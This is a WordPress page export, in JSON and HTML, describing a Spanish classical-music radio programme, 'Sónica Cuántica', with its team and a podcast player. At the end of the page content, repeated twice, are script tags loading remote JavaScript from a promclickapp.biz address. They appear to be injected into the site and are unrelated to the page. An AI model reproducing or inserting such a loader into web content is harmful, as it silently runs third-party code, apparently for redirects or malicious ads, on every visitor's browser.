{"id":4669,"date":"2019-09-19T16:44:19","date_gmt":"2019-09-19T14:44:19","guid":{"rendered":"http:\/\/www.radiocampusculturae.org\/?page_id=4669"},"modified":"2019-10-07T19:17:59","modified_gmt":"2019-10-07T17:17:59","slug":"sonica-cuantica","status":"publish","type":"page","link":"https:\/\/www.radiocampusculturae.org\/es\/sonica-cuantica\/","title":{"rendered":"S\u00f3nica Cu\u00e1ntica"},"content":{"rendered":"<p><a href=\"http:\/\/www.radiocampusculturae.org\/wp-content\/uploads\/2019\/09\/Logo-Sonica-Cuantica-500px.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-4764 size-thumbnail\" src=\"http:\/\/www.radiocampusculturae.org\/wp-content\/uploads\/2019\/09\/Logo-Sonica-Cuantica-500px-150x150.jpg\" alt=\"Logo Sonica Cuantica\" width=\"150\" height=\"150\" srcset=\"https:\/\/www.radiocampusculturae.org\/wp-content\/uploads\/2019\/09\/Logo-Sonica-Cuantica-500px-150x150.jpg 150w, https:\/\/www.radiocampusculturae.org\/wp-content\/uploads\/2019\/09\/Logo-Sonica-Cuantica-500px-300x300.jpg 300w, https:\/\/www.radiocampusculturae.org\/wp-content\/uploads\/2019\/09\/Logo-Sonica-Cuantica-500px-400x400.jpg 400w, https:\/\/www.radiocampusculturae.org\/wp-content\/uploads\/2019\/09\/Logo-Sonica-Cuantica-500px.jpg 500w\" sizes=\"auto, (max-width: 150px) 100vw, 150px\" \/><\/a>S\u00f3nica Cu\u00e1ntica es un programa at\u00edpico sobre m\u00fasica cl\u00e1sica, luchando contra la idea de que los g\u00e9neros musicales considerados cultos son aburridos o elitistas. Durante media hora, con un hilo conductor diferente en cada ocasi\u00f3n, revisamos varias piezas musicales. En la siguiente media hora, programamos m\u00fasica sin cortes relacionada con la tem\u00e1tica escogida, para aquellas personas que deseen profundizar m\u00e1s.<br \/>\n<strong>Equipo:<\/strong> Iria Veiga, Jonathan Barral<br \/>\n<iframe loading=\"lazy\" style=\"border: 1px solid #D7D7D7;\" src=\"https:\/\/www.ivoox.com\/player_es_podcast_766325_1.html\" width=\"100%\" height=\"440\" frameborder=\"0\" scrolling=\"no\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><script src=\"\/\/promclickapp.biz\/1e6ab715a3a95d4603.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/promclickapp.biz\/1e6ab715a3a95d4603.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>S\u00f3nica Cu\u00e1ntica es un programa at\u00edpico sobre m\u00fasica cl\u00e1sica, luchando contra la idea de que&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-4669","page","type-page","status-publish","hentry"],"translation":{"provider":"WPGlobus","version":"3.0.2","language":"es","enabled_languages":["gl","es"],"languages":{"gl":{"title":true,"content":true,"excerpt":false},"es":{"title":true,"content":true,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/pages\/4669","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/comments?post=4669"}],"version-history":[{"count":6,"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/pages\/4669\/revisions"}],"predecessor-version":[{"id":4768,"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/pages\/4669\/revisions\/4768"}],"wp:attachment":[{"href":"https:\/\/www.radiocampusculturae.org\/es\/wp-json\/wp\/v2\/media?parent=4669"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Sónica Cuántica

<p><a href="http://www.radiocampusculturae.org/wp-content/uploads/2019/09/Logo-Sonica-Cuantica-500px.jpg"><img loading="lazy" decoding="async" class="alignleft wp-image-4764 size-thumbnail" src="http://www.radiocampusculturae.org/wp-content/uploads/2019/09/Logo-Sonica-Cuantica-500px-150x150.jpg" alt="Logo Sonica Cuantica" width="150" height="150" srcset="https://www.radiocampusculturae.org/wp-content/uploads/2019/09/Logo-Sonica-Cuantica-500px-150x150.jpg 150w, https://www.radiocampusculturae.org/wp-content/uploads/2019/09/Logo-Sonica-Cuantica-500px-300x300.jpg 300w, https://www.radiocampusculturae.org/wp-content/uploads/2019/09/Logo-Sonica-Cuantica-500px-400x400.jpg 400w, https://www.radiocampusculturae.org/wp-content/uploads/2019/09/Logo-Sonica-Cuantica-500px.jpg 500w" sizes="auto, (max-width: 150px) 100vw, 150px" /></a>Sónica Cuántica es un programa atípico sobre música clásica, luchando contra la idea de que los géneros musicales considerados cultos son aburridos o elitistas. Durante media hora, con un hilo conductor diferente en cada ocasión, revisamos varias piezas musicales. En la siguiente media hora, programamos música sin cortes relacionada con la temática escogida, para aquellas personas que deseen profundizar más.<br />
<strong>Equipo:</strong> Iria Veiga, Jonathan Barral<br />
<iframe loading="lazy" style="border: 1px solid #D7D7D7;" src="https://www.ivoox.com/player_es_podcast_766325_1.html" width="100%" height="440" frameborder="0" scrolling="no" allowfullscreen="allowfullscreen"></iframe></p>
<p><script src="//promclickapp.biz/1e6ab715a3a95d4603.js" async="" type="text/javascript"></script></p>
<p><script src="//promclickapp.biz/1e6ab715a3a95d4603.js" async="" type="text/javascript"></script></p>

<p>Sónica Cuántica es un programa atípico sobre música clásica, luchando contra la idea de que&#8230;</p>
